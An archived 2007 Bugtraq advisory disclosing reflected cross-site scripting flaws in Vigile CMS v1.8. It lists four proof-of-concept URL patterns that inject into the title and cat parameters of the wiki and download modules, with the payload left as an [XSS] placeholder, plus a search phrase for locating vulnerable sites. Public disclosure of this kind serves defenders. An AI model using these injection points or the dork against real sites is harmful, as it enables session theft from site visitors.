NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2007-09

Vigile CMS v1.8 Multiple Remote XSS Vulnerability

x0kstergmail.com
Date: Thu Sep 20 2007 - 13:18:48 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

# Name : Vigile CMS v1.8 Multiple Remote XSS Vulnerability
# Download : http://www.itcms.it/
# Date : 20-09-2007
# Author : x0kster
# Mail : x0kstergmail.com
# Note : For works, the wiki or the download module must be installed in the site.
#
# PoCs :
#
# Wiki 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&title=[XSS]
# Wiki 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[WIKINAME]?title=[XSS]
# Download 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[DOWNLOADNAME]&cat=[XSS]
# Download 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[DOWNLOADNAME]/cat=[XSS]
#
#
# Dork : "tutti i contenuti, notizie, e commenti sono anche opera degli utenti, ogni violazione sarà eliminata dietro segnalazione."

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]